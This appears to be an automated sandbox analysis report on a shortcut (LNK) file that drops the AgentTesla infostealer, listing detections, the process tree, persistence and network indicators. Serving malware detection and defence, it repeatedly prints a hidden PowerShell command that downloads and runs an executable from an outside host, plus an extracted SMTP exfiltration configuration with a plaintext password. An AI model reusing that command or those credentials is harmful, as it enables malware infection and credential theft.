
Windows Analysis Report
RTGS-WB-ABS-240730-NEW.lnk

Overview

General Information

Sample name: RTGS-WB-ABS-240730-NEW.lnk
Analysis ID: 1520403
MD5: 82937aae96fa6a40b59703eea97ce1ef
SHA1: d23b17711e2e65609c9973d6f03dde3d2acb3568
SHA256: d820d9f270915fc81bedefd16bf7b8a20cb88a4d1e55d8566b9367fa494ac356
Tags: lnk, user-abuse_ch

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
Yara detected AgentTesla
AI detected suspicious sample
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops VBS files to the startup folder
Hides that the sample has been downloaded from the Internet (zone.identifier)
Installs a global keyboard hook
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Powershell drops PE file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 1824 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oootorgline.ru/components/grace.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • file.exe (PID: 5956 cmdline: "C:\Users\user\AppData\Local\Temp\file.exe" MD5: AA6F514A7AFA81E26BCF612923EA483C)
      • recomplaint.exe (PID: 5692 cmdline: "C:\Users\user\AppData\Local\Temp\file.exe" MD5: AA6F514A7AFA81E26BCF612923EA483C)
        • RegSvcs.exe (PID: 4412 cmdline: "C:\Users\user\AppData\Local\Temp\file.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 4872 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\recomplaint.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • recomplaint.exe (PID: 6436 cmdline: "C:\Users\user\AppData\Local\unspattered\recomplaint.exe" MD5: AA6F514A7AFA81E26BCF612923EA483C)
      • RegSvcs.exe (PID: 5768 cmdline: "C:\Users\user\AppData\Local\unspattered\recomplaint.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • aWUFv.exe (PID: 3884 cmdline: "C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • conhost.exe (PID: 3504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • aWUFv.exe (PID: 2120 cmdline: "C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • conhost.exe (PID: 884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "techniqueqatar.com", "Username": "info@techniqueqatar.com", "Password": "TechFB2023$$$"}
Source | Rule | Description | Author
dump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Source | Rule | Description | Author
0000000C.00000002.3370850966.0000000002944000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000000C.00000002.3370850966.0000000002944000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000000C.00000002.3370850966.0000000002989000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000008.00000002.2557012499.0000000000402000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000008.00000002.2557012499.0000000000402000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
Source | Rule | Description | Author
8.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
8.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
8.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
8.2.RegSvcs.exe.400000.0.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen
Matched strings for INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID:
  • 0x36d36:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x36da8:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x36e32:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x36ec4:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x36f2e:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x36fa0:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x37036:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x370c6:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548

System Summary

Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oootorgline.ru/components/grace.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oootorgline.ru/components/grace.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oootorgline.ru/components/grace.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", ProcessId: 1824, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oootorgline.ru/components/grace.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oootorgline.ru/components/grace.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oootorgline.ru/components/grace.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", ProcessId: 1824, ProcessName: powershell.exe
Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\recomplaint.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\recomplaint.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\recomplaint.vbs" , ProcessId: 4872, ProcessName: wscript.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 4412, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\aWUFv
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Users\user\AppData\Local\Temp\file.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\file.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\file.exe" , ParentImage: C:\Users\user\AppData\Local\unspattered\recomplaint.exe, ParentProcessId: 5692, ParentProcessName: recomplaint.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\file.exe" , ProcessId: 4412, ProcessName: RegSvcs.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oootorgline.ru/components/grace.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oootorgline.ru/components/grace.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oootorgline.ru/components/grace.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", ProcessId: 1824, ProcessName: powershell.exe
Source: Network Connection; Author: frack113; Data: DestinationIp: 208.91.198.176, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 4412, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 61255
Source: Process started; Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oootorgline.ru/components/grace.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oootorgline.ru/components/grace.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oootorgline.ru/components/grace.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", ProcessId: 1824, ProcessName: powershell.exe
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\recomplaint.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\recomplaint.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\recomplaint.vbs" , ProcessId: 4872, ProcessName: wscript.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oootorgline.ru/components/grace.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oootorgline.ru/components/grace.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oootorgline.ru/components/grace.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", ProcessId: 1824, ProcessName: powershell.exe

Data Obfuscation

Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Users\user\AppData\Local\unspattered\recomplaint.exe, ProcessId: 5692, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\recomplaint.vbs

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-27T10:38:56.228125+0200 | 2030171 | 1 | A Network Trojan was detected | 192.168.2.6 | 60913 | 208.91.198.176 | 587 | TCP
2024-09-27T10:39:33.684199+0200 | 2030171 | 1 | A Network Trojan was detected | 192.168.2.6 | 61255 | 208.91.198.176 | 587 | TCP
2024-09-27T10:39:47.577844+0200 | 2030171 | 1 | A Network Trojan was detected | 192.168.2.6 | 60905 | 208.91.198.176 | 587 | TCP
2024-09-27T10:39:50.515013+0200 | 2030171 | 1 | A Network Trojan was detected | 192.168.2.6 | 60912 | 208.91.198.176 | 587 | TCP


AV Detection

Source: 8.2.RegSvcs.exe.400000.0.unpack; Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "techniqueqatar.com", "Username": "info@techniqueqatar.com", "Password": "TechFB2023$$$"}
Source: RTGS-WB-ABS-240730-NEW.lnk; ReversingLabs: Detection: 23%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.8% probability
Source: C:\Users\user\AppData\Local\Temp\file.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exe; Joe Sandbox ML: detected
Source: unknown; HTTPS traffic detected: 176.99.3.36:443 -> 192.168.2.6:61245 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.6:61253 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:60910 version: TLS 1.2
Source: Binary string: RegSvcs.pdb, source: aWUFv.exe, 0000000D.00000000.2622184453.0000000000502000.00000002.00000001.01000000.00000009.sdmp, aWUFv.exe.8.dr
Source: Binary string: wntdll.pdbUGP, source: recomplaint.exe, 00000007.00000003.2386568009.0000000004530000.00000004.00001000.00020000.00000000.sdmp, recomplaint.exe, 00000007.00000003.2387078782.00000000046D0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb, source: recomplaint.exe, 00000007.00000003.2386568009.0000000004530000.00000004.00001000.00020000.00000000.sdmp, recomplaint.exe, 00000007.00000003.2387078782.00000000046D0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: RegSvcs.pdb, source: aWUFv.exe, 0000000D.00000000.2622184453.0000000000502000.00000002.00000001.01000000.00000009.sdmp, aWUFv.exe.8.dr

Networking

Source: Network traffic; Suricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.6:61255 -> 208.91.198.176:587
Source: Network traffic; Suricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.6:60905 -> 208.91.198.176:587
Source: Network traffic; Suricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.6:60912 -> 208.91.198.176:587
Source: Network traffic; Suricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.6:60913 -> 208.91.198.176:587
Source: Yara match; File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: global traffic; TCP traffic: 192.168.2.6:61255 -> 208.91.198.176:587
Source: global traffic; HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Source: Joe Sandbox View; IP Address: 208.95.112.1
Source: Joe Sandbox View; IP Address: 104.26.13.205
Source: Joe Sandbox View; ASN Name: PUBLIC-DOMAIN-REGISTRYUS
Source: Joe Sandbox View; ASN Name: TUT-ASUS
Source: Joe Sandbox View; ASN Name: AS-REGRU
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown; DNS query: name: api.ipify.org
Source: unknown; DNS query: name: ip-api.com
Source: global traffic; HTTP traffic detected: GET /components/grace.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: oootorgline.ru Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; DNS traffic detected: DNS query: oootorgline.ru
Source: global traffic; DNS traffic detected: DNS query: api.ipify.org
Source: global traffic; DNS traffic detected: DNS query: ip-api.com
Source: global traffic; DNS traffic detected: DNS query: techniqueqatar.com
Source: global traffic; DNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
Source: RegSvcs.exe, 0000000C.00000002.3381286822.0000000005C16000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.m
Source: RegSvcs.exe, 00000008.00000002.2567429663.0000000003401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3370850966.0000000002931000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://ip-api.com
Source: RegSvcs.exe, 00000008.00000002.2557012499.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2567429663.0000000003401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3370850966.0000000002931000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 00000000.00000002.2287618621.00000221376BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2287618621.0000022137800000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.2262113733.0000022128C30000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://oootorgline.ru
Source: powershell.exe, 00000000.00000002.2262113733.0000022127882000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.2262113733.0000022127651000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2567429663.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3370850966.00000000028EC000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 00000008.00000002.2567429663.00000000034CB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2567429663.000000000343E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3370850966.0000000002989000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3370850966.0000000002A17000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://techniqueqatar.com
Source: powershell.exe, 00000000.00000002.2262113733.0000022127882000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.2296430995.000002213F920000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.microsoft.co
Source: RegSvcs.exe, 00000008.00000002.2557012499.0000000000402000.00000040.80000000.00040000.00000000.sdmp; String found in binary or memory: https://account.dyn.com/
Source: powershell.exe, 00000000.00000002.2262113733.0000022127651000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
Source: RegSvcs.exe, 00000008.00000002.2567429663.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2557012499.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3370850966.00000000028EC000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://api.ipify.org
Source: RegSvcs.exe, 00000008.00000002.2567429663.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3370850966.00000000028EC000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://api.ipify.org/
Source: RegSvcs.exe, 00000008.00000002.2567429663.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3370850966.00000000028EC000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://api.ipify.org/t
Source: powershell.exe, 00000000.00000002.2287618621.0000022137800000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.2287618621.0000022137800000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.2287618621.0000022137800000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.2262113733.0000022127882000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.2262113733.0000022128282000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.2287618621.00000221376BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2287618621.0000022137800000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.2262113733.0000022128282000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://oootorgline.ru
Source: powershell.exe, 00000000.00000002.2262113733.0000022129169000.00000004.00000800.00020000.00000000.sdmp, RTGS-WB-ABS-240730-NEW.lnk; String found in binary or memory: https://oootorgline.ru/components/grace.exe
Source: unknown; Network traffic detected: HTTP traffic on port 60910 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 61245 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 61253
Source: unknown; Network traffic detected: HTTP traffic on port 61253 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 60910
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 61245
                    Source: unknownHTTPS traffic detected: 176.99.3.36:443 -> 192.168.2.6:61245 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.6:61253 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:60910 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window created: window name: CLIPBRDWNDCLASS

System Summary

Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\file.exe
